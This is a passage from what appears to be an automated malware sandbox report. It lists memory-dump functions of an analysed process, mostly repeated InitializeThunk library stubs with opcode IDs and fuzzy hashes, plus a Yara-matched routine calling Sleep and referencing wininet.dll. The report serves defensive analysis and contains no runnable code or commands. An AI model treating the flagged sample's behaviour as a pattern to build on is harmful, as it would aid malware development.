                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01FF07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01FEF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01FEF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01FEFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01FEFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01FEFB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01FEFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01FEFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01FEFAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                                • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                                • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                                • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01FEFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01FEFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01FEFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01FEFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01FEFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00096ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 00096F78
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                • Opcode ID: 819bee04a7e7d6e057f1c6dcf151a008b2b0b8b0de6c4166cc31338411b0e2c8
                                                                                                                                                                • Instruction ID: 5db4347087e42a734f46b48b741abacaa776633d3b9bc2b08fdfc74665a15ccb
                                                                                                                                                                • Opcode Fuzzy Hash: 819bee04a7e7d6e057f1c6dcf151a008b2b0b8b0de6c4166cc31338411b0e2c8
                                                                                                                                                                • Instruction Fuzzy Hash: 2C318FB1601704ABCB25DF68D8B1FA7B7F8BB48700F00842DF61A9B242D731A945DBA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00096ECA, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 00096F78
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                • Opcode ID: ddc631b31dbe1b46d4deae8cc24b5b7275541578467dd39335509dc8f548f312
                                                                                                                                                                • Instruction ID: bccaeebff6772f1550c2254d5a333f64b5d05fcb01a67594bccd4ecc595330cb
